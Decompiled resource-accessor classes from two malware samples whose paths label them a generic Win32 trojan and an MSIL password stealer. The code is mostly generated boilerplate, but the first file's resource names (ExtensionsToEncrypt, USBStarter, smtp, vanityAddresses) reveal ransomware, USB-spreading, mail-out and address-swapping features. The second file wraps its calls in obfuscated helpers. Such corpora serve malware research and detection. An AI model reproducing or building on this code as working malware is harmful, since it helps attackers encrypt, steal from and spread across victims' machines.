File: HEUR-Trojan/Win32/G/HEUR-Trojan.Win32.Generic-8862636861e0bb63dbb1c90a72bac6a40746efa23d007ced52614a655741a650/svchst/Main/Properties/Resources.vb
Imports System
Imports System.CodeDom.Compiler
Imports System.ComponentModel
Imports System.Diagnostics
Imports System.Globalization
Imports System.Resources
Imports System.Runtime.CompilerServices

Namespace Main.Properties
	' Token: 0x02000067 RID: 103
	<CompilerGenerated()>
	<DebuggerNonUserCode()>
	<GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")>
	Friend Class Resources
		' Token: 0x060001F9 RID: 505 RVA: 0x000023D2 File Offset: 0x000005D2
		Friend Sub New()
		End Sub

		' Token: 0x1700002D RID: 45
		' (get) Token: 0x060001FA RID: 506 RVA: 0x00011FBC File Offset: 0x000101BC
		<EditorBrowsable(EditorBrowsableState.Advanced)>
		Friend Shared ReadOnly Property ResourceManager As ResourceManager
			Get
				If Resources.resourceMan Is Nothing Then
					Dim resourceManager As ResourceManager = New ResourceManager("Main.Properties.Resources", GetType(Resources).Assembly)
					Resources.resourceMan = resourceManager
				End If
				Return Resources.resourceMan
			End Get
		End Property

		' Token: 0x1700002E RID: 46
		' (get) Token: 0x060001FB RID: 507 RVA: 0x00011FFC File Offset: 0x000101FC
		' (set) Token: 0x060001FC RID: 508 RVA: 0x00002B28 File Offset: 0x00000D28
		<EditorBrowsable(EditorBrowsableState.Advanced)>
		Friend Shared Property Culture As CultureInfo
			Get
				Return Resources.resourceCulture
			End Get
			Set(value As CultureInfo)
				Resources.resourceCulture = value
			End Set
		End Property

		' Token: 0x1700002F RID: 47
		' (get) Token: 0x060001FD RID: 509 RVA: 0x00012010 File Offset: 0x00010210
		Friend Shared ReadOnly Property ExtensionsToEncrypt As String
			Get
				Return Resources.ResourceManager.GetString("ExtensionsToEncrypt", Resources.resourceCulture)
			End Get
		End Property

		' Token: 0x17000030 RID: 48
		' (get) Token: 0x060001FE RID: 510 RVA: 0x00012034 File Offset: 0x00010234
		Friend Shared ReadOnly Property Ionic_Zip As Byte()
			Get
				Dim [object] As Object = Resources.ResourceManager.GetObject("Ionic_Zip", Resources.resourceCulture)
				Return CType([object], Byte())
			End Get
		End Property

		' Token: 0x17000031 RID: 49
		' (get) Token: 0x060001FF RID: 511 RVA: 0x00012060 File Offset: 0x00010260
		Friend Shared ReadOnly Property kernelbas32 As Byte()
			Get
				Dim [object] As Object = Resources.ResourceManager.GetObject("kernelbas32", Resources.resourceCulture)
				Return CType([object], Byte())
			End Get
		End Property

		' Token: 0x17000032 RID: 50
		' (get) Token: 0x06000200 RID: 512 RVA: 0x0001208C File Offset: 0x0001028C
		Friend Shared ReadOnly Property lvl_x64 As Byte()
			Get
				Dim [object] As Object = Resources.ResourceManager.GetObject("lvl_x64", Resources.resourceCulture)
				Return CType([object], Byte())
			End Get
		End Property

		' Token: 0x17000033 RID: 51
		' (get) Token: 0x06000201 RID: 513 RVA: 0x000120B8 File Offset: 0x000102B8
		Friend Shared ReadOnly Property lvl_x86 As Byte()
			Get
				Dim [object] As Object = Resources.ResourceManager.GetObject("lvl_x86", Resources.resourceCulture)
				Return CType([object], Byte())
			End Get
		End Property

		' Token: 0x17000034 RID: 52
		' (get) Token: 0x06000202 RID: 514 RVA: 0x000120E4 File Offset: 0x000102E4
		Friend Shared ReadOnly Property Newtonsoft_Json As Byte()
			Get
				Dim [object] As Object = Resources.ResourceManager.GetObject("Newtonsoft_Json", Resources.resourceCulture)
				Return CType([object], Byte())
			End Get
		End Property

		' Token: 0x17000035 RID: 53
		' (get) Token: 0x06000203 RID: 515 RVA: 0x00012110 File Offset: 0x00010310
		Friend Shared ReadOnly Property registration As Byte()
			Get
				Dim [object] As Object = Resources.ResourceManager.GetObject("registration", Resources.resourceCulture)
				Return CType([object], Byte())
			End Get
		End Property

		' Token: 0x17000036 RID: 54
		' (get) Token: 0x06000204 RID: 516 RVA: 0x0001213C File Offset: 0x0001033C
		Friend Shared ReadOnly Property registration1 As Byte()
			Get
				Dim [object] As Object = Resources.ResourceManager.GetObject("registration1", Resources.resourceCulture)
				Return CType([object], Byte())
			End Get
		End Property

		' Token: 0x17000037 RID: 55
		' (get) Token: 0x06000205 RID: 517 RVA: 0x00012168 File Offset: 0x00010368
		Friend Shared ReadOnly Property SkinSoft_VisualStyler As Byte()
			Get
				Dim [object] As Object = Resources.ResourceManager.GetObject("SkinSoft_VisualStyler", Resources.resourceCulture)
				Return CType([object], Byte())
			End Get
		End Property

		' Token: 0x17000038 RID: 56
		' (get) Token: 0x06000206 RID: 518 RVA: 0x00012194 File Offset: 0x00010394
		Friend Shared ReadOnly Property smtp As String
			Get
				Return Resources.ResourceManager.GetString("smtp", Resources.resourceCulture)
			End Get
		End Property

		' Token: 0x17000039 RID: 57
		' (get) Token: 0x06000207 RID: 519 RVA: 0x000121B8 File Offset: 0x000103B8
		Friend Shared ReadOnly Property StartModeDebug As String
			Get
				Return Resources.ResourceManager.GetString("StartModeDebug", Resources.resourceCulture)
			End Get
		End Property

		' Token: 0x1700003A RID: 58
		' (get) Token: 0x06000208 RID: 520 RVA: 0x000121DC File Offset: 0x000103DC
		Friend Shared ReadOnly Property USBStarter As Byte()
			Get
				Dim [object] As Object = Resources.ResourceManager.GetObject("USBStarter", Resources.resourceCulture)
				Return CType([object], Byte())
			End Get
		End Property

		' Token: 0x1700003B RID: 59
		' (get) Token: 0x06000209 RID: 521 RVA: 0x00012208 File Offset: 0x00010408
		Friend Shared ReadOnly Property vanityAddresses As String
			Get
				Return Resources.ResourceManager.GetString("vanityAddresses", Resources.resourceCulture)
			End Get
		End Property

		' Token: 0x040001B7 RID: 439
		Private Shared resourceMan As ResourceManager

		' Token: 0x040001B8 RID: 440
		Private Shared resourceCulture As CultureInfo
	End Class
End Namespace

File: HEUR-Trojan-PSW/MSIL/S/HEUR-Trojan-PSW.MSIL.Stealer.gen-d6e26fa2f4dcfe5a112c21fb851f626aa7ee8e9f6cac73bd27f927b054f7182d/GraphComposite.Properties/Resources.cs
using System;
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Drawing;
using System.Globalization;
using System.Reflection;
using System.Resources;
using System.Runtime.CompilerServices;

namespace GraphComposite.Properties;

[DebuggerNonUserCode]
[CompilerGenerated]
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "16.0.0.0")]
internal class Resources
{
	private static ResourceManager resourceMan;

	private static CultureInfo resourceCulture;

	[EditorBrowsable(EditorBrowsableState.Advanced)]
	internal static ResourceManager ResourceManager
	{
		get
		{
			if (resourceMan == null)
			{
				ResourceManager resourceManager = (resourceMan = Resources.smethod_2("GraphComposite.Properties.Resources", Resources.smethod_1(Resources.smethod_0(typeof(Resources).TypeHandle))));
			}
			return resourceMan;
		}
	}

	[EditorBrowsable(EditorBrowsableState.Advanced)]
	internal static CultureInfo Culture
	{
		get
		{
			return resourceCulture;
		}
		set
		{
			resourceCulture = value;
		}
	}

	internal static Bitmap boycartoon
	{
		get
		{
			//IL_0016: Unknown result type (might be due to invalid IL or missing references)
			//IL_001c: Expected O, but got Unknown
			object obj = Resources.smethod_3(ResourceManager, "boycartoon", resourceCulture);
			return (Bitmap)obj;
		}
	}

	internal static Bitmap coocking
	{
		get
		{
			//IL_0016: Unknown result type (might be due to invalid IL or missing references)
			//IL_001c: Expected O, but got Unknown
			object obj = Resources.smethod_3(ResourceManager, "coocking", resourceCulture);
			return (Bitmap)obj;
		}
	}

	internal static Bitmap svnu
	{
		get
		{
			//IL_0016: Unknown result type (might be due to invalid IL or missing references)
			//IL_001c: Expected O, but got Unknown
			object obj = Resources.smethod_3(ResourceManager, "svnu", resourceCulture);
			return (Bitmap)obj;
		}
	}

	internal static Bitmap santa_hat
	{
		get
		{
			//IL_0016: Unknown result type (might be due to invalid IL or missing references)
			//IL_001c: Expected O, but got Unknown
			object obj = Resources.smethod_3(ResourceManager, "santa_hat", resourceCulture);
			return (Bitmap)obj;
		}
	}

	internal Resources()
	{
	}

	static Type smethod_0(RuntimeTypeHandle runtimeTypeHandle_0)
	{
		return Type.GetTypeFromHandle(runtimeTypeHandle_0);
	}

	static Assembly smethod_1(Type type_0)
	{
		return type_0.Assembly;
	}

	static ResourceManager smethod_2(string string_0, Assembly assembly_0)
	{
		return new ResourceManager(string_0, assembly_0);
	}

	static object smethod_3(ResourceManager resourceManager_0, string string_0, CultureInfo cultureInfo_0)
	{
		return resourceManager_0.GetObject(string_0, cultureInfo_0);
	}
}
